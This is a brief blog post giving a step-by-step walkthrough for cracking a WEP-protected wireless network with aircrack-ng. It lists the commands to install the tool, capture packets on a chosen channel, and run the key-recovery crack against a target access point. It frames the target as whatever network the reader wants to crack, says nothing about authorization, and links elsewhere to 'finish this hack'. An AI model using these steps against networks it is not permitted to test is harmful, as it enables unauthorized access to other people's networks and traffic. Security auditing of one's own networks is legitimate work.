12Sep Wireless Cracking Simplified Explanation
It’s fairly easy to crack a WEP encrypted wireless network. Infact the WEP encryption has some serious flaws in its design, flaws that make it easy and fast to crack or hack.
Install aircrack-ng - on Debian Etch by:
sudo apt-get install aircrack-ng
Then start aircrack-ng to look for wireless networks:
sudo airodump-ng eth1
Then notice the channel number of the wireless network you want to crack.
Quit aircrack-ng and start it again with med specific channel number to collect packages faster:
sudo airodump-ng -c 4 -w dump eth1
Then wait and let it collect about 500K IVS and the try the do the actual crack:
sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap
Find out how to finish this hack at http://mediakey.dk/~cc/hack-wireless-network-crack/
Related articles by Zemanta
- Always keep your wireless off on the iPhone 3G until you need to use it
- Wi-Fi users vulnerable to ‘piggybacking’
- Cafe Latte attack steals credentials from Wi-Fi clients
- WiFi flu: viral router attack could hit whole cities
- The Dream Customer
- WarDriving 101
- Protecting Yourself Against ID Theft
- BT gives Home Hub a makeover
- Gadget clinic
Leave a Comment
You must be logged in to post a comment.


![Wireless Cracking Simplified Explanation Reblog this post [with Zemanta]](http://img.zemanta.com/reblog_b.png?x-id=1f9db17b-8983-4028-a97f-f7bd6b022136)















